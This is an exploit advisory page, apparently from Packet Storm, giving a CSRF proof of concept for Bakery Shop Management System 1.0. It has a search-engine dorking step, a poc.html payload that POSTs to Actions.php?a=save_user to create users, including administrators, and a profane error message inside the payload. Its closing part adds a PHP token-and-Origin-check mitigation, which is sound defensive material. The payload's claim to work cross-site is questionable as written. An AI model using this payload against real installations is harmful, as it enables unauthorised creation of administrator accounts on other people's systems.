## https://sploitus.com/exploit?id=PACKETSTORM:180072
=============================================================================================================================================
| # Title : Bakery Shop Management System 1.0 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |
| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/bsms_0.zip |
=============================================================================================================================================
PoC :
[+] Dorking in Google or other search engines.
[+] This HTML code represents a simple user form that collects data for a user (a full name, username, and user type) and submits it to the server using AJAX.
Let me break down the key components of this code:
[+] HTML Structure
Container & Form:
<div class="container-fluid">: This div serves as a container for the form and ensures that it will take up the full width of its parent container.
<form action="" id="user-form">: This form collects user data. The action attribute is empty, meaning the form doesn't submit in the traditional way (it's handled via JavaScript instead).
Hidden Input:
<input type="hidden" name="id" value="">: This hidden input is used to store the user ID. It might be used for editing an existing user, where the user ID is sent back to the server but isn't visible to the user.
[+] Form Fields:
Full Name:
<label for="fullname" class="control-label">Username</label>
<input type="text" name="fullname" id="fullname" required class="form-control form-control-sm rounded-0" value="">
This field is actually mislabeled: the label says "Username", but the input is for the user's full name.
The input field is styled using Bootstrap classes.
Username:
<label for="username" class="control-label">Password</label>
<input type="text" name="username" id="username" required class="form-control form-control-sm rounded-0" value="">
[+] Similarly, this field is labeled "Password", but the input is meant for the username. The input type should be password instead of text for security reasons.
[+] User Type:
<label for="type" class="control-label">Type</label>
<select name="type" id="type" class="form-select form-select-sm rounded-0" required>
<option value="1">Administrator</option>
<option value="0">Cashier</option>
</select>
This dropdown allows the user to select their type, either "Administrator" or "Cashier". The selected value (1 or 0) is sent to the server.
[+] Submit Button:
<button type="submit" class="btn btn-primary">Save</button>: This button submits the form. It's styled as a primary button using Bootstrap.
[+] JavaScript (jQuery)
Form Submission Handling:
$(function(){ ... }): This is a jQuery shorthand for $(document).ready(), meaning the function runs after the DOM is fully loaded.
$('#user-form').submit(function(e){ ... }): This function handles the form submission.
The default form submission behavior is prevented (e.preventDefault()), meaning the form doesn't reload the page.
Message Handling:
$('.pop_msg').remove();: This removes any previous pop-up messages before submitting the form.
_el.addClass('pop_msg'): Creates a new element for displaying messages (e.g., success or error messages).
AJAX Request:
$.ajax({ ... }): Sends the form data to the server without reloading the page.
URL: The form is submitted to http://127.0.0.1/bsms/Actions.php?a=save_user.
Method: The data is sent using the POST method.
Data: The form data is serialized with _this.serialize() (URL-encoded form fields), and a JSON response is expected from the server (dataType: 'JSON').
Error Handling:
If an error occurs, the script logs it to the console and displays an error message (which currently says "Yes Mother fucker !"; this is an inappropriate message and should be corrected to something like "An error occurred.").
Success Handling:
If the submission is successful, the form is reset, a success message is shown, and the page reloads after a short delay (2 seconds).
If the submission fails, the error message from the server response is displayed.
[+] Line 36: set your target URL.
[+] Save the payload as poc.html.
[+] Payload :
<div class="container-fluid">
  <form action="" id="user-form">
    <input type="hidden" name="id" value="">
    <div class="form-group">
      <label for="fullname" class="control-label">Username</label>
      <input type="text" name="fullname" id="fullname" required class="form-control form-control-sm rounded-0" value="">
    </div>
    <div class="form-group">
      <label for="username" class="control-label">Password</label>
      <input type="text" name="username" id="username" required class="form-control form-control-sm rounded-0" value="">
    </div>
    <div class="form-group">
      <label for="type" class="control-label">Type</label>
      <select name="type" id="type" class="form-select form-select-sm rounded-0" required>
        <option value="1">Administrator</option>
        <option value="0">Cashier</option>
      </select>
    </div>
    <button type="submit" class="btn btn-primary">Save</button>
  </form>
</div>
<script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
<script>
$(function(){
  $('#user-form').submit(function(e){
    e.preventDefault();
    $('.pop_msg').remove(); // Remove any previous pop-up messages
    var _this = $(this);
    var _el = $('<div>').addClass('pop_msg');
    $('#user-form button[type="submit"]').attr('disabled', true).text('Submitting form...');
    $.ajax({
      url: 'http://127.0.0.1/bsms/Actions.php?a=save_user',
      method: 'POST',
      data: _this.serialize(),
      dataType: 'JSON',
      error: function(err) {
        console.log(err);
        _el.addClass('alert alert-danger').text("Yes Mother fucker !");
        _this.prepend(_el);
        _el.show('slow');
        $('#user-form button[type="submit"]').attr('disabled', false).text('Save');
      },
      success: function(resp) {
        if (resp.status == 'success') {
          _el.addClass('alert alert-success').text(resp.msg);
          _this.prepend(_el);
          _el.show('slow');
          $('#user-form').get(0).reset(); // Reset form after successful submission
          // Optional: reload page after a short delay
          setTimeout(function() {
            location.reload();
          }, 2000);
        } else {
          _el.addClass('alert alert-danger').text(resp.msg);
          _this.prepend(_el);
          _el.show('slow');
        }
        $('#user-form button[type="submit"]').attr('disabled', false).text('Save');
      }
    });
  });
});
</script>
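The PoC relies on Actions.php?a=save_user accepting a POST whose every field a third-party page can supply, so nothing ties the request to a form the application itself served. The following is an added mitigation example written for this page, not code from the vendor's bsms package: a per-session synchronizer token checked with a constant-time compare plus an Origin check, applied before the save_user branch runs. The file name csrf.php, SITE_ORIGIN and the 'failed' status value are assumptions; the status/msg response shape mirrors the fields the PoC's success handler reads.

```php
<?php
// csrf.php: added mitigation example, not part of the vendor's bsms code.
// Assumes session_start() has run and that Actions.php dispatches on $_GET['a'].

// Assumption: the origin the application is served from.
const SITE_ORIGIN = 'http://127.0.0.1';

// One random token per session, created on first use.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hidden field to render inside every state-changing form (e.g. #user-form).
// Because jQuery's serialize() includes hidden inputs, the existing AJAX
// submit code needs no change once this field is in the form.
function csrf_field(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

// True only if the POST carries the session's token (constant-time compare)
// and, when the browser sent an Origin header, that header names this site.
function csrf_request_ok(array $post, array $server): bool
{
    $sent     = $post['csrf_token'] ?? '';
    $expected = $_SESSION['csrf_token'] ?? '';
    if ($sent === '' || $expected === '' || !hash_equals($expected, $sent)) {
        return false;
    }
    if (isset($server['HTTP_ORIGIN']) && $server['HTTP_ORIGIN'] !== SITE_ORIGIN) {
        return false;
    }
    return true;
}

// Usage at the top of Actions.php, ahead of the save_user branch:
//   session_set_cookie_params(['samesite' => 'Lax', 'httponly' => true]);
//   session_start();
//   require __DIR__ . '/csrf.php';
//   if ($_SERVER['REQUEST_METHOD'] === 'POST' && !csrf_request_ok($_POST, $_SERVER)) {
//       http_response_code(403);
//       echo json_encode(['status' => 'failed', 'msg' => 'Invalid or missing CSRF token']);
//       exit;
//   }
```

With this in place, a page such as poc.html never obtains the session's token, so its POST is rejected before save_user runs; the SameSite=Lax cookie attribute additionally keeps the session cookie off cross-site POSTs in current browsers.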
Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================